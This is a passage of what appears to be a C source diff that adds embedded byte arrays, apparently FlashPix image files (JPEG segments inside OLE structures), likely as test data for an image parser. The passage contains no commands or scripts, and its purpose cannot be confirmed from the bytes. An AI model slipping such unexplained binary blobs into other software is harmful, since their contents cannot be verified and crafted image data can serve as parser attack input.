+"\x03\xd7\xd6\x9b\x20\x64\x88\xf9\x2a\x0b\x76\x06\xa4\xa2\xa0\xd0"
+"\xa1\x14\x57\x0d\x76\x25\x9a\x08\xf8\x3c\x31\x6c\x91\xf4\xf4\xab"
+"\xf4\x52\x12\x00\xc9\x38\x1e\xf4\x01\x5a\xf7\xcf\x2b\xb2\x28\x52"
+"\x44\x60\x77\x06\x35\x2d\xb1\x73\x6e\x86\x44\x11\xb6\x39\x51\xda"
+"\x87\x9d\x47\x0b\xc9\xaa\xf2\x4e\xc7\x8c\xf3\xe8\x28\x0b\x10\x6a"
+"\xee\xeb\x0b\xb4\x64\x83\x91\xca\xd6\x24\x37\x17\x9e\x79\xdd\x23"
+"\x91\xb8\x6d\xc1\x26\xb5\x89\x7b\x86\x21\x1b\x6c\x63\xef\x38\xef"
+"\xec\x3f\xc6\xab\x47\x6e\x57\xca\x9a\x37\x29\xe6\x1c\x67\xa8\x07"
+"\x3c\x64\x57\x3d\x4c\x33\xa9\x35\x2e\x6b\x1a\x46\xb7\x24\x6d\xcb"
+"\x73\xa2\xa6\xb3\xaa\xfd\xe3\x8a\x86\x69\x18\x39\x50\x70\x2a\x1a"
+"\xde\xe4\x58\x99\xae\x0f\xf0\x0f\xc4\xd4\x4c\xc4\xf2\xc7\xf3\xa4"
+"\x3c\x0e\x99\xa8\x5a\x68\x95\xf1\x34\x8a\xa7\xae\xd2\x69\x37\xdc"
+"\x76\x1e\x5f\x20\x90\x70\xa3\xab\x1a\x80\x03\x73\x9c\x65\x61\xee"
+"\x7b\xbf\xff\x00\x5a\x9a\xb2\x25\xdc\xdb\x59\xd4\xa0\x3f\x2a\x03"
+"\x9d\xde\xe6\xae\x0e\x9c\x74\xa6\x9a\xe8\x2b\x5f\x72\x2b\x82\x22"
+"\xb4\x7d\xa3\x00\x2e\x00\x14\x79\x2a\xd6\xa2\x16\xce\x36\xe3\x8e"
+"\xb4\x5c\x23\x49\x18\x55\xee\xc3\x3f\x4c\xd4\xb4\x5f\x40\xb6\xa0"
+"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8"
+"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x24\x00\x00\x00"
+"\x40\x00\x00\x00\x37\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
+"\x40\x00\x00\x00\x03\x00\x00\x00\x24\x00\x00\x00\x10\x00\x00\x00"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00"
+"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x48\x00\x65\x00"
+"\x61\x00\x64\x00\x65\x00\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x2a\x00\x02\x01\x15\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x6e\x00\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00"
+"\x53\x00\x75\x00\x62\x00\x69\x00\x6d\x00\x61\x00\x67\x00\x65\x00"
+"\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x20\x00\x44\x00\x61\x00"
+"\x74\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x26\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x6f\x00\x00\x00\x5e\x02\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00"
+"\x6a\x00\x65\x00\x63\x00\x74\x00\x20\x00\x30\x00\x30\x00\x30\x00"
+"\x30\x00\x30\x00\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x28\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x02\x00\x00\x00\x94\x00\x00\x00\x00\x00\x00\x00"
+"\x05\x00\x4f\x00\x70\x00\x65\x00\x72\x00\x61\x00\x74\x00\x69\x00"
+"\x6f\x00\x6e\x00\x20\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"
+"\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x24\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00"
+"\x75\x41\x1a\x97\x7c\xb2\x56\x61\x6d\x6b\x35\xb4\xbb\x56\xe9\xe5"
+"\xb7\xc7\x11\xca\x37\x32\x9f\x66\xea\x47\xd7\x3f\x5a\x94\x5d\x5b"
+"\x9b\xa3\x6b\xe6\xa8\x9c\x0c\xf9\x67\x82\x47\xa8\xf5\xfc\x2a\x5a"
+"\x8a\xe6\xd6\x0b\xb8\xbc\xbb\x98\x96\x45\x1c\x8c\x8e\x41\xf5\x07"
+"\xb1\xfa\x54\xde\xef\x52\xac\xd2\xf7\x4c\x6d\x6c\x1d\x2f\x54\xb7"
+"\xd6\xe3\x07\xca\xe2\x1b\xb0\x3b\xa9\xe8\xdf\x87\xf8\x56\xf0\x20"
+"\x80\x41\x04\x11\x90\x47\x7a\x8e\xe6\x08\xee\xad\xa4\xb7\x9d\x77"
+"\x47\x22\x95\x61\xec\x6b\x27\xc3\x73\xcb\x12\xcf\xa4\x5d\xb6\x67"
+"\xb1\x6d\xaa\xc7\xf8\xe3\x3f\x74\xff\x00\x9f\x6a\xd1\xfb\xf0\xbf"
+"\x55\xf9\x19\xaf\x72\x76\xe8\xff\x00\x33\x6a\x8a\x28\xac\x4d\xc2"
+"\xb2\x35\x1d\x14\xbd\xc9\xd4\x34\xa9\x45\xa5\xf8\xea\x47\xdc\x97"
+"\xd9\x87\xf5\xad\x7a\x2a\xa3\x27\x17\x74\x44\xe0\xa6\xac\xcc\xad"
+"\x33\x5a\x5b\x89\xcd\x8d\xfc\x5f\x63\xd4\x17\xac\x4d\xd1\xfd\xd4"
+"\xf7\xad\x5a\xa7\xa9\xe9\x96\xba\xa5\xbf\x95\x72\xb8\x65\xe5\x24"
+"\x5e\x19\x0f\xa8\x35\x99\x16\xa5\x79\xa2\xca\xb6\xba\xe1\x33\x5b"
+"\xb1\xc4\x57\xca\xbc\x7d\x1c\x76\x3f\xe7\x9a\xd3\x95\x4f\x58\x6f"
+"\xdb\xfc\x8c\xf9\xdd\x3d\x27\xb7\x7f\xf3\x37\xeb\x0f\xc4\x31\xbd"
+"\x95\xc5\xbe\xb9\x6e\xa5\x9a\xdb\xe4\x9d\x47\xf1\xc4\x7f\xc3\xfc"
+"\xf4\xad\xca\x6c\x91\xa4\xb1\x34\x72\x28\x64\x70\x55\x94\xf7\x07"
+"\xa8\xa8\x84\xb9\x65\x72\xea\x43\x9e\x36\x08\xe4\x49\x62\x49\x62"
+"\x60\xc8\xea\x19\x58\x77\x07\xa5\x3a\xb0\xfc\x3c\xef\x63\x75\x71"
+"\xa1\xdc\x31\x2d\x01\xf3\x2d\xd8\xff\x00\x14\x44\xff\x00\x4f\xf3"
+"\xd2\xb7\x28\x9c\x79\x5d\x82\x9c\xf9\xe3\x70\xa2\x8a\x2a\x0d\x02"
+"\x9b\x2c\x51\xcd\x13\x45\x32\x2c\x91\xb8\xc3\x2b\x0c\x82\x29\xd4"
+"\x50\x20\xa2\x8a\x28\x19\x8d\xe2\x4b\x79\x63\x8e\x1d\x5a\xd1\x73"
+"\x73\x62\x77\x11\xfd\xf8\xff\x00\x88\x7f\x9f\x7a\xd5\xb6\xb8\x8e"
+"\xea\xd6\x2b\x88\x0e\xe8\xe5\x50\xca\x7d\x8d\x48\x40\x20\x82\x01"
+"\x07\x82\x0f\x7a\xcb\xd1\x2c\x2e\x34\xc6\xba\xb5\x38\x36\x62\x4d"
+"\xf6\xc7\x3c\x80\x7a\xae\x3d\xab\x5b\xa9\x42\xcf\x74\x63\x67\x19"
+"\xdd\x6c\xff\x00\x33\x52\x8a\x28\xac\x8d\x82\x8a\x28\xb7\x44\x6b"
+"\xe6\x66\xb6\xf9\xd6\x31\x89\xc8\x1d\x09\x3f\x28\x3f\x86\x7f\x1a"
+"\x69\x5c\x4d\xd8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22"
+"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11"
+"\x03\x11\x00\x3f\x00\xf4\x7a\x2a\x29\xda\x68\x61\x06\xde\x11\x39"
+"\x5c\x65\x0b\xed\x24\x7b\x13\xdf\xeb\x4d\xb5\xba\x8e\xe9\x5b\x62"
+"\xc8\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x29\x59\xda\xe3"
+"\xe6\x57\xb1\x3d\x14\x51\x48\xa0\xa2\x8a\x28\x01\x22\x55\x84\x30"
+"\x85\x44\x61\x89\x27\x68\xc6\x49\xef\xf5\xa7\x2c\xd3\x43\x6b\xb4"
+"\x66\xe6\x55\x5e\x0b\x90\xa5\xcf\xb9\x03\x03\xf2\xa4\xa2\x9d\xc5"
+"\x60\xa5\xcd\x35\x59\x5d\x43\x23\x06\x52\x32\x18\x1c\x82\x29\x69"
+"\x0c\xa7\x1c\x57\xb0\x4e\x00\x99\x6e\x6d\xd9\xb9\xf3\x78\x92\x31"
+"\xec\x40\xc3\x0f\xaf\x3e\xf5\x6f\x7a\xf9\x82\x3d\xcb\xbc\x8c\x85"
+"\xcf\x24\x7a\xe2\x96\xa1\xba\xb4\xb7\xbb\x50\x27\x8c\x31\x5f\xba"
+"\xe0\xe1\x97\xdc\x11\xc8\xaa\xbd\xde\xa4\x59\xa5\xa1\x35\x15\x0a"
+"\x87\xb6\xb4\xc6\x66\xba\x64\x1c\x67\x1b\xdb\xf9\x0c\xd2\x5a\xde"
+"\xdb\xdd\x6e\x10\xbf\xce\xbf\x7a\x37\x05\x5d\x7e\xaa\x79\x14\xac"
+"\xf7\x1f\x32\xd9\x93\xd1\x45\x14\x8a\x39\xf6\xb4\xbd\xf0\xf3\x34"
+"\xba\x62\xb5\xde\x9c\x4e\x5e\xd4\x9c\xbc\x7e\xa5\x0f\x7f\xa7\xff"
+"\x00\xae\xb5\xf4\xfb\xfb\x5d\x4a\xd8\x4f\x67\x28\x91\x3b\x8e\xea"
+"\x7d\x08\xed\x56\x6b\x1f\x50\xd1\x5b\xed\x27\x50\xd2\x25\x16\x97"
+"\xbf\xc4\x31\xf2\x4d\xec\xc3\xfa\xd6\xdc\xca\xa7\xc5\xbf\x7f\xf3"
+"\xff\x00\x33\x0e\x59\x53\xf8\x35\x5d\xbf\xcb\xfc\x8d\x8a\x2b\x2f"
+"\x4b\xd6\x52\xee\x63\x67\x79\x11\xb3\xbf\x4f\xbd\x0b\xff\x00\x17"
+"\xba\x9e\xe2\xb5\x2b\x39\x45\xc5\xd9\x9a\xc6\x6a\x6a\xe8\x29\x36"
+"\x29\x90\x48\x55\x77\x81\x80\xd8\xe7\x1e\x99\xa5\xa2\xa4\x65\x39"
+"\xe5\xbe\xb7\x99\x9d\x61\x5b\xab\x73\xfc\x31\xfc\xb2\x27\xe0\x78"
+"\x6f\xd0\xd5\xc1\xcd\x15\x0d\xd5\xac\x77\x51\x85\x90\xba\x95\x3b"
+"\x95\xe3\x72\xac\xa7\xd4\x11\x55\x74\xc5\x66\xb6\x26\xa2\xad\x08"
+"\x21\x59\x9a\x61\x12\x09\x58\x05\x67\xc7\x24\x0e\x83\x35\x95\x3e"
+"\xab\x63\x69\x77\x74\x96\xd6\xc6\x5b\x81\x8f\x30\xc6\xa0\x06\x6f"
+"\x42\xc7\xb8\x15\x32\x71\x8a\xbc\x9d\x90\xd5\xdb\xb2\x43\x75\x4d"
+"\x2a\xd7\x54\x84\x25\xc2\x90\xe9\xcc\x72\xa1\xc3\xa1\xf6\x35\x4e"
+"\xc2\xef\x51\xb2\xbc\x8f\x4e\xd5\x63\x6b\x80\xfc\x43\x79\x1a\xe4"
+"\x37\xb3\xfa\x1f\xf3\xef\x53\x47\xad\xa4\x30\xb3\xc3\xa5\x15\x92"
+"\x47\x2c\xe8\x1d\x46\x4f\xf7\x89\xef\x4a\xba\xd4\x50\x6c\x8a\x0d"
+"\x2c\x88\x9b\x97\xda\xca\x02\x92\x79\xe3\xbd\x4a\xc5\xd2\xb7\x2b"
+"\x92\x6b\xd7\xfa\xff\x00\x82\x4b\xa1\x3b\xf3\x28\xb4\xff\x00\xaf"
+"\xeb\xc8\xd2\xa2\xb3\x23\xd5\xed\xd5\x1e\xd0\x69\x7b\x6d\x42\x95"
+"\x50\x0a\xe1\x87\xa6\xde\xd9\xa6\x9d\x62\x29\x2c\x1a\x09\x34\x8f"
+"\x90\x00\xab\x01\x75\x2a\x56\xa3\xeb\x14\x7f\x9d\x1a\xfb\x3a\x9f"
+"\xca\xcd\x5a\x2b\x32\x6d\x6a\x19\x60\x89\x66\xd2\x9a\x55\x27\x2e"
+"\x99\x43\xb3\x07\x8c\x67\xad\x6d\x6c\xb6\xbb\x48\xe4\xdb\x1c\xaa"
+"\xad\xbd\x1b\x19\xc1\x1d\xc7\xbd\x5c\x27\x09\xfc\x32\xb9\x32\x52"
+"\x8e\xe8\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02"
+"\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11"
+"\x00\x3f\x00\xf4\xd7\xbc\x86\x28\x96\x49\xdc\x45\x92\x17\x9e\xc4"
+"\xf6\xab\x15\x46\x91\x93\x73\xc6\xfb\x9c\x18\xce\x57\x6b\x10\x3f"
+"\x11\xdf\xf1\xa2\xe3\xb3\x2f\xd5\x6d\x46\xec\x58\xd8\x4d\x72\x50"
+"\xb9\x45\xe1\x41\xc6\xe2\x78\x03\xf3\x22\x9a\x27\x9b\xcf\x5c\x98"
+"\xcc\x5b\x4e\x46\x0e\xec\xf6\xe7\xa6\x29\x27\x36\xf7\xc9\x3d\x95"
+"\xc4\x4f\xe5\xb2\x00\xc5\x86\x03\x03\xe8\x7d\x45\x35\x6b\xea\x4c"
+"\xaf\x6d\x0a\x17\x93\xea\xda\x5d\x93\xdf\xdc\xcf\x05\xca\xa0\xcc"
+"\x90\x24\x5b\x71\x9f\xee\xb6\x79\xc1\xf5\xea\x3d\x2a\x4b\x7d\x42"
+"\xdb\x4c\xb5\x86\xce\xf2\xe2\x49\x6e\xa3\x8c\x34\xdb\x51\xa4\x2a"
+"\x4f\x24\xb6\x01\xc0\xcf\xaf\x6a\x6c\xba\x65\xdd\xc8\x82\x29\x35"
+"\x4f\x3e\xda\x29\x95\xa4\x42\x80\x17\x0b\xce\x18\x8e\xa7\x20\x7a"
+"\x52\x5b\x5c\xae\x95\x71\x79\x1d\xdc\x13\x93\x2c\xed\x2c\x72\x47"
+"\x0b\x38\x94\x1e\x83\xe5\x07\x91\xd3\x07\xd0\x56\xda\x35\x6d\xfd"
+"\x0c\x35\x4e\xfb\x2f\x33\x5e\x19\x63\x9e\x14\x96\x17\x57\x8d\xc6"
+"\xe5\x65\x39\x04\x53\xeb\x99\x82\xda\xe6\x59\x6d\x2c\x37\xc9\x67"
+"\xba\x59\x6f\x64\x44\x23\x74\x68\x58\xed\x4f\x4e\x77\x7e\x86\xac"
+"\xd9\xc9\xa9\xad\xcd\xf5\xb5\xa4\xa9\x34\x16\xee\x15\x65\xbb\x24"
+"\x9c\x63\x9a\x4a\x00\x28\xa5\xc1\xc6\x71\xc5\x18\x3e\x86\x80\x2e"
+"\xd6\x6c\x91\xc3\x04\x73\x81\xb9\xa3\x25\xdd\x80\x25\x89\x27\x93"
+"\x8f\xf0\xad\x2a\xcf\x45\x85\x5a\x4f\xb3\xed\x0a\x64\x62\xdb\x4f"
+"\xf1\x67\xe6\xfc\x73\x9a\x6f\x62\x56\xe6\x1c\x01\x8d\x86\x76\xdd"
+"\x00\xd3\x06\xb8\x45\x0d\x90\x9c\xe1\x41\x3c\x9f\x7c\x53\x8c\x32"
+"\xc9\x1c\x69\x18\xb8\x4b\x56\xbb\x40\x80\x92\x18\x26\x0e\xef\x70"
+"\x33\x5b\x84\xf7\x27\xf3\xa8\x45\xed\xab\x2a\x30\xb9\x8f\x0e\x70"
+"\xa7\x77\x53\x5c\xbe\xc9\x2d\x1b\x3b\x7d\xbc\x9b\xba\x5f\xd7\xf5"
+"\xf8\x18\xf3\x45\x72\x90\x3c\x0b\xe6\x0b\x64\xb9\x60\x72\x19\xb0"
+"\x98\x18\xe9\xc9\x19\xad\x1d\x29\x65\x4b\x22\x1d\xd9\x86\xe3\xe5"
+"\x87\x52\xbb\x47\xa7\x39\x38\xab\x0b\x75\x6e\x49\x0b\x3a\x12\xa4"
+"\x02\x01\xe8\x73\x8f\xe7\xc5\x2a\xdc\xc0\xee\x55\x66\x46\x60\xdb"
+"\x48\x0d\xce\x6a\xa3\x08\xc6\x57\xb9\x33\xa9\x29\x47\x95\xa3\x37"
+"\x4c\x09\xe7\x27\x9e\xb7\x9f\x6c\xe7\xcc\x66\xce\xdf\xf0\xc7\xa6"
+"\x2a\xb5\xbd\xbc\xf1\x5a\xda\x4a\xbe\x79\x96\x54\x95\x65\x04\x93"
+"\xd8\xed\xc8\xed\x5b\x26\xf2\xd8\x75\xb8\x8c\x63\x1f\xc5\xeb\xd2"
+"\xab\x6a\x5a\x84\xf6\xb3\xc1\x6f\x69\x69\xf6\x99\xa6\x56\x7c\x19"
+"\x36\x05\x51\x8c\xf3\xf8\x8a\x23\x45\x4a\xc9\x3f\xeb\xfa\x41\x3c"
+"\x4b\x85\xdb\x5b\xff\x00\xc1\xff\x00\x33\x76\xa8\x2b\x44\xed\x21"
+"\x83\x6e\xd1\x23\x03\xb4\x63\xe6\x07\xe6\xfd\x73\x57\xeb\x32\x72"
+"\x2f\x20\xb8\x48\x8b\x46\x49\x78\xf7\x15\xc1\x04\x71\x9a\xe8\x7b"
+"\x1c\x91\xdf\x51\xe1\xd1\xd9\xd1\x58\x12\xbc\x36\x3b\x66\xa8\x8d"
+"\x1e\x00\x13\x32\x33\x6c\xc8\xe5\x46\x08\x27\x38\xc7\x6a\x82\x4d"
+"\x26\x57\x56\xda\x61\x88\x16\xcf\x96\x84\x85\xfb\xb8\xfc\xea\xcd"
+"\xdd\x81\x9e\x34\x5d\xf9\xd9\x13\x22\x96\x27\x3b\xb8\xc3\x7e\x95"
+"\xce\xef\x2d\xe2\x75\xab\x41\xae\x59\xee\x3d\x34\xf8\x95\xe1\x70"
+"\x5b\x30\xbb\x30\xe7\x83\x92\x4e\x0f\xd0\xf4\xa8\xe2\xd2\x61\x81"
+"\x7f\x73\x23\x23\x02\x19\x1b\x68\xca\xe0\xe4\x7d\x47\xd6\xa3\x97"
+"\x4c\x95\xda\x5c\x4a\xab\xbf\x76\x5c\x67\x73\xe4\x83\x86\xfa\x63"
+"\x8a\x25\xd2\xb3\xe6\x79\x7b\x17\x7f\x98\x3a\x91\xc1\x20\xa8\xfc"
+"\x30\x6a\x5a\xfe\xe9\x4a\x5f\xdf\xfc\x05\xb8\xb3\xb4\x82\xdc\xc7"
+"\x35\xd7\x94\xb2\x15\xc3\x36\x01\xca\x8e\xc7\xb1\xef\x4b\x75\x8f"
+"\xed\xeb\x4c\xe7\x3f\x67\x97\x1f\xf7\xd2\x54\x97\x36\xb3\xcb\x65"
+"\x1d\xba\xbc\x63\xe4\xda\xe7\x04\x73\xc7\x23\x1f\xcb\xbd\x55\xd7"
+"\x6d\xda\x46\x82\x68\x35\x38\xac\x6e\xa3\x46\x55\x32\x01\x87\x07"
+"\x19\xe0\xf4\xe4\x0e\x6b\xa2\x8c\x7d\xe6\xb6\x39\xb1\x12\xbc\x13"
+"\xbd\xdd\xff\x00\xc8\xe9\x6a\x8f\x98\x64\x67\x62\x8c\x98\x72\xb8"
+"\x6e\xf8\x38\xcf\xd0\xf5\xab\xd5\x44\x33\xbb\x39\x92\x3f\x2c\x87"
+"\x60\x06\x73\x90\x0f\x07\xf1\x1c\xd5\xbd\x8c\x96\xe1\x45\x14\x54"
+"\x96\x14\x51\x45\x00\x15\x4e\xeb\x4b\xb6\xba\xba\x17\x32\xb4\xcb"
+;
+
+unsigned char FPX_file3[] = 
+"\x28\x4d\x80\xc7\x29\x5e\x33\x9c\x71\x57\x28\xa6\x9b\x5b\x12\xe2"
+"\xa5\xa3\x00\xff\xd9\x0d\xc0\xf9\xf1\xfc\x2c\x3a\x1f\xc4\x71\x54"
+"\xb5\x56\x25\xe8\xee\x5c\xa4\x65\x0c\xa5\x58\x02\x0f\x50\x69\x68"
+"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00"
+"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03"
+"\x11\x00\x3f\x00\xf4\x7a\x29\x70\x7d\x0d\x51\xbf\x48\x8c\x98\x96"
+"\xee\xea\x13\x70\x9e\x42\xac\x2e\x46\x0e\x73\xb8\x60\x70\xde\xfe"
+"\x95\x0d\xa5\xb9\x69\x37\xa2\x2e\xd1\x51\xa4\x1e\x54\xd2\xb9\x92"
+"\x56\xf3\x31\xf2\xbb\x65\x57\x03\x1f\x28\xed\x9e\xa7\xde\xa4\xa6"
+"\x22\x6b\x56\x94\xc2\xfb\xe3\x0b\x86\x21\x30\x73\xb8\x76\x3e\xd5"
+"\xc9\x40\x64\x68\x11\xa7\x1b\x64\x23\x2e\x3d\xfb\xd7\x5b\x6d\xe6"
+"\xf9\x0f\xe7\x14\x1f\x31\xd8\x57\x3f\x77\xb6\x7d\xeb\x91\xb6\x05"
+"\x6d\xe3\x0d\x20\x90\x85\x19\x70\x72\x1b\xde\xbc\xdc\xd3\xe0\x8f"
+"\xa9\xd7\x82\xf8\x99\x25\x15\x43\x56\x42\xc2\xdc\xba\x49\x25\xb0"
+"\x93\xf7\xe9\x18\x27\x23\x69\xc6\x40\xe4\x8c\xe3\x23\xfa\x55\x46"
+"\xb6\xb7\x9d\x6d\xe3\xb4\xb7\x9e\x3b\x63\x75\x99\x00\x0c\x8a\xc3"
+"\xcb\x6e\xdd\x97\x38\xec\x01\x35\xe4\x46\x9a\x6a\xed\x9d\xce\x6d"
+"\x3b\x1d\x04\xb1\x49\x12\x69\xec\xab\x3b\xc9\xb5\x59\xa3\xf9\xb0"
+"\x58\xe3\x27\x76\x78\x3f\x5e\x31\x57\x2f\xd1\x6e\x6f\x6c\xe4\x44"
+"\x94\xf9\x6f\x22\x93\x82\xb8\xc0\xe3\xf0\xcf\xe7\x51\x7f\x68\x6b"
+"\x5f\xf4\x06\x87\xff\x00\x02\x87\xf8\x54\xb6\x1a\x95\xcc\xd7\xe6"
+"\xce\xfa\xc8\x5b\x4a\x63\x32\xa6\xd9\x77\x86\x00\xe0\xf6\xe3\xa8"
+"\xaf\xa6\xfa\xb3\x49\xea\xbf\x0e\x9f\x33\xcb\xfa\xe2\x6d\x68\xef"
+"\xaf\x7e\xbf\x21\xda\x5a\xc9\x0d\x8c\x20\xc1\x23\x33\x80\xce\xef"
+"\x92\x76\x82\x57\x23\xd3\x23\x9f\x7e\xf5\x2e\x9f\x66\x52\xa9\xdd"
+"\x17\xe8\xa2\x8a\xc0\xe9\x0a\x28\xa2\x80\x12\x25\x58\x4b\x18\x95"
+"\x50\xb9\xdc\xdb\x46\x37\x1f\x53\xef\x4e\x8a\x59\xa1\xb6\x2a\xcc"
+"\x6e\x24\x50\x70\x5f\x0a\x5b\xd0\x1c\x0c\x7b\x52\x51\x4e\xe2\xb2"
+"\x1c\x6e\x2d\xa1\x8f\xed\x97\x2a\x90\x48\xca\xab\x23\x1e\x48\xe7"
+"\x81\x91\xd4\x64\x9a\x8e\x5d\x3d\xa3\xd2\xae\xad\x6c\x64\xd9\x2c"
+"\xe5\xdb\xcc\x90\xe7\xe6\x72\x49\x3c\x7d\x78\xfa\x0a\x75\x35\xd0"
+"\x39\x42\x59\xc1\x46\xdc\x36\xb1\x1c\xfb\xe3\xa8\xf6\xaa\x52\xb1"
+"\x0e\x17\x1d\x45\x43\x6b\x1c\xf1\x46\xcb\x71\x3f\x9f\x83\xf2\xb9"
+"\x4d\xad\x8f\x7c\x70\x4f\xb8\xc5\x2d\xb5\xd4\x17\x4a\x5a\xde\x55"
+"\x7d\xa7\x0c\x3a\x15\x3e\x84\x1e\x47\xe3\x53\x62\x93\xee\x4b\x45"
+"\x14\x52\x28\x28\xa2\x8a\x00\x28\xa2\x8a\x00\x2a\x17\xb5\xb7\x92"
+"\xe5\x2e\x5a\x25\xf3\xd3\xa4\x83\x86\xfa\x12\x3a\x8f\x63\x56\x67"
+"\x8b\x6d\xc1\x97\x7b\x90\xca\x17\x67\xf0\x8c\x13\xc8\xf7\xe7\xf4"
+"\x14\xca\x7b\x6c\x4e\xfb\x88\xbb\xb9\xdc\x41\xe7\x8c\x0c\x71\x4b"
+"\x45\x14\x8a\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x00\xff\xd9\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11"
+"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff"
+"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x2b"
+"\x32\x2d\x6e\xd0\xe9\xf6\xb7\x37\x0c\x62\x7b\x94\xde\xb1\x2a\x97"
+"\x6f\x7c\x05\x04\x91\xef\x57\x2d\xef\x2d\xee\x60\xf3\xad\xe5\x12"
+"\xa6\x09\xf9\x79\x3c\x75\x18\xeb\x9f\x6a\xa7\x16\xb7\x44\xa9\xc5"
+"\xec\xc9\xe8\xa8\xad\xa6\x17\x16\xf1\xcc\xa8\xe8\x1d\x43\x6d\x91"
+"\x76\xb0\xfa\x8e\xd5\x2d\x49\x41\x45\x14\x50\x01\x45\x14\x50\x06"
+"\x22\x88\xb4\x7d\x56\x49\x26\x89\xc5\xb3\xc1\x1c\x51\x4a\xa8\x5c"
+"\x46\x13\x23\x61\xc0\xe3\xa8\x3e\x86\xb3\xd9\xd6\xea\xe2\xf6\xea"
+"\xd1\x65\x82\x4b\xd9\xd2\xca\x36\xc1\x56\x18\xe6\x46\xc7\x51\xc0"
+"\x3f\xf7\xc8\xae\x83\xcf\x9f\xce\x4c\x18\xfc\xac\x1d\xe0\x83\xb8"
+"\x9e\xd8\x3d\x28\xdf\x6f\x2d\xda\xab\x42\xc1\xe2\x05\xd2\x42\xb8"
+"\x00\x9c\x83\x83\xeb\xfe\x35\xaa\xa9\xd7\xa9\x8c\xa9\xf4\xe8\x67"
+"\x43\x3e\xa5\x73\xf6\xdb\xbb\x7b\xa8\x63\xb6\x49\x19\x61\x59\x23"
+"\x2c\x18\x20\xc1\xc9\xc8\xc0\x2c\x0f\xbd\x59\x4d\x6a\x0f\xb2\xda"
+"\xc8\xf1\xcc\x66\xb8\x89\x65\x10\x45\x19\x91\x94\x11\xd4\xe0\x74"
